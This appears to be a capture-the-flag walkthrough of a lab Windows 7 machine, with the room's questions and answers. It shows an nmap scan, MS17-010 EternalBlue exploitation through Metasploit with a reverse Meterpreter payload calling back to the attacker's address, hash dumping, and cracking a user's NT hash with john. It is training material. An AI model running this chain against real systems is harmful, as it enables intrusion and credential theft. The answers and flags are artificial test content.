```
# Nmap 7.80 scan initiated Fri Aug 21 21:08:36 2020 as: nmap -p- -sSVC -oA nmap_full -v 10.10.154.183
Nmap scan report for 10.10.154.183
Host is up (0.032s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2020-08-21T19:10:56+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-08-20T19:07:58
| Not valid after:  2021-02-19T19:07:58
| MD5:   28ea b5fa cada ea23 bc6f e60e 7dc0 fd8d
|_SHA-1: 523e 8122 7947 f063 5f10 2406 61ba 2488 2269 c256
|_ssl-date: 2020-08-21T19:11:02+00:00; 0s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 21 21:11:02 2020 -- 1 IP address (1 host up) scanned in 146.04 seconds
```
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Answer:
ms17-010
Port 445 (SMB) is open on a Windows 7 SP1 (build 7601) host, and SMBv1 appears to be enabled with a default configuration, so the obvious candidate is MS17-010.
```
   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
```
Show options and set the one required value. What is the name of this value? (All caps for submission)
Answer:
RHOSTS
We can use the options command to list the module's options and see which required one is not yet set.
```
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.98     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.154.183
RHOSTS => 10.10.154.183
```
But we also need to change the payload options to use the THM VPN interface:
```
$ ip addr show dev tun0
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none
    inet 10.8.24.100/16 brd 10.8.255.255 scope global tun0
       valid_lft forever preferred_lft forever
```

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.8.24.100
LHOST => 10.8.24.100
```
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer:
post/multi/manage/shell_to_meterpreter
There are many articles explaining how to upgrade a command shell to Meterpreter, but we don't need that here because we already have a Meterpreter session: the exploit module must have been updated since the room was created, as it now defaults to a Meterpreter payload.
Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
Answer:
SESSION
To answer this question we first need to background our Meterpreter session.
```
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
```
If we didn't already have a Meterpreter session, we could have set SESSION to the session holding the plain Windows command shell in order to upgrade it to Meterpreter.
```
  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.8.24.100:4444 -> 10.10.154.183:49218 (10.10.154.183)
```
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
```
$ john --user=Jon --format=nt hash.txt --wordlist=/usr/share/wordlists/password/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g 0:00:00:02 DONE (2020-08-21 22:03) 0.4098g/s 4180Kp/s 4180Kc/s 4180KC/s alqueva1968..alpus
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
```
We can see the password with:
```
$ john --user=Jon --format=nt hash.txt --show
Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
```
```
meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40777/rwxrwxrwx   0         dir   2009-07-14 05:18:56 +0200  $Recycle.Bin
40777/rwxrwxrwx   0         dir   2009-07-14 07:08:56 +0200  Documents and Settings
40777/rwxrwxrwx   0         dir   2009-07-14 05:20:08 +0200  PerfLogs
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Program Files
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Program Files (x86)
40777/rwxrwxrwx   4096      dir   2009-07-14 05:20:08 +0200  ProgramData
40777/rwxrwxrwx   0         dir   2018-12-13 04:13:22 +0100  Recovery
40777/rwxrwxrwx   4096      dir   2018-12-13 00:01:17 +0100  System Volume Information
40555/r-xr-xr-x   4096      dir   2009-07-14 05:20:08 +0200  Users
40777/rwxrwxrwx   16384     dir   2009-07-14 05:20:08 +0200  Windows
100666/rw-rw-rw-  24        fil   2018-12-13 04:47:39 +0100  flag1.txt
0000/---------    58066832  fif   1971-11-04 18:16:00 +0100  hiberfil.sys
0000/---------    58066832  fif   1971-11-04 18:16:00 +0100  pagefile.sys

meterpreter > cat flag1.txt
flag{REDACTED}
```
Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.
Answer:
sam_database_elevated_access
The SAM database is stored in C:\windows\system32\config; in this directory we can see a flag file.
```
meterpreter > dir Documents
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Music
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Pictures
40777/rwxrwxrwx   0     dir   2018-12-13 04:13:31 +0100  My Videos
100666/rw-rw-rw-  402   fil   2018-12-13 04:13:45 +0100  desktop.ini
100666/rw-rw-rw-  37    fil   2018-12-13 04:49:18 +0100  flag3.txt
```